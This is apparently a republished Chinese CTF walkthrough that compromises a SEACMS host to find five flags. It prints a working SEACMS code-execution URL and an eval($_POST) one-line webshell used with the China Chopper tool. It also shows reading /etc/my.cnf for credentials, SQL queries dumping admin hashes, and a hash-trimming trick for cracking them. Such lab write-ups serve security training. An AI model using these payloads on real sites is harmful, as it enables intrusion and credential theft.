您好,登錄后才能下訂單哦!
這篇文章主要介紹“CTF主機滲透實戰(zhàn)分析”的相關知識,小編通過實際案例向大家展示操作過程,操作方法簡單快捷,實用性強,希望這篇“CTF主機滲透實戰(zhàn)分析”文章能幫助大家解決問題。
實戰(zhàn)此題如下:
此道題一共需要拿到5個flag,從哪里入手呢?
第一步:首先我們打開連接地址:http://202.0.0.206
第二步:漏洞分析
根據(jù)分析,此道題是一個SEACMS的平臺系統(tǒng)
該版本通過其他論壇平臺了解到存在一個代碼執(zhí)行漏洞。Exp:/search.php?searchtype=5&tid=&area=phpinfo()。我們來試試此漏洞能夠利用,直接在后面的phpinfo()就可以執(zhí)行任意php代碼直接訪問http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo()發(fā)現(xiàn)phpinfo()執(zhí)行成功了,說明該漏洞存在。
我們嘗試看看源碼中有沒有flag,右鍵打開此頁面的源碼,在源碼果然有一個flag= flag1{ac727d1a3130e4093b3665120a3240a5}
第三步:一句話木馬利用
接下來我們利用一句話木馬來利用。
使用使用exp:/search.php?searchtype=5&tid=&area=eval($_POST[simple])構(gòu)造一句話小馬。
打開工具菜刀,在地址欄中填寫
http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]),密碼為simple,點擊添加
連接成功了,如下:
第四步:胡亂搗騰
接下來就是耗時的去找了,如小偷進家,沒有目的只能胡亂的翻了!
費時很久在 /home目錄下發(fā)現(xiàn)有key文件,打開文件,獲得flag2=
flag2{6634eaf4ce34a82da12d835c1ed86a24}
在 /etc目錄下的my.cnf關于數(shù)據(jù)庫mysql的配置文件。發(fā)現(xiàn)flag3和數(shù)據(jù)庫相關賬戶信息。flag3{da04113d21f02f0ebfd281d0a7a64e34},并且得到了數(shù)據(jù)庫的密碼。
第五步:數(shù)據(jù)庫操作
在上一步獲取到關于數(shù)據(jù)庫的用戶名和密碼,使用用戶名和密碼,重新配置菜刀,連接數(shù)據(jù)庫。
提交打開數(shù)據(jù)庫,在seacms中的flag表中,找到一個flag= flag4{32730c5cc0bd7bb8ffde4457649fd409}
分別在數(shù)據(jù)庫中查詢seacms的后臺的賬號密碼
SELECT `name` FROM `sea_admin`
SELECT `password` FROM `sea_admin`
第六步:密碼破解
取到的密碼是MD5加密,密碼為:23a7bbd73250516f069d 百度MD5在線解密,發(fā)現(xiàn)該加密值是20位,使用了和dedecms一樣的加密方式,將該加密值的前三位和最后一位去掉,就是16位的MD5加密,在線解密結(jié)果是admin123。
第六步:找后臺登錄頁面
接下來找到網(wǎng)站的后臺登錄頁面,我們這里使用DirBuster工具。
使用在數(shù)據(jù)庫中已經(jīng)獲得的用用戶名和密碼,登錄網(wǎng)站后臺密碼是admin123。
好了,登錄成功,我們拿到了后臺登錄頁面,并可以使用管理員賬號登錄。
第七步:胡亂搗騰
在后臺逛了半天,終于在網(wǎng)站后臺查找計劃任務時,發(fā)現(xiàn)key5。
flag5{f01cbadfd0daee0d65c2502a38581558}
最后,到此為止,5個flag全部找出來了,接下來我們把5個flag放入答題框。
關于“CTF主機滲透實戰(zhàn)分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關的知識,可以關注億速云行業(yè)資訊頻道,小編每天都會為大家更新不同的知識點。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。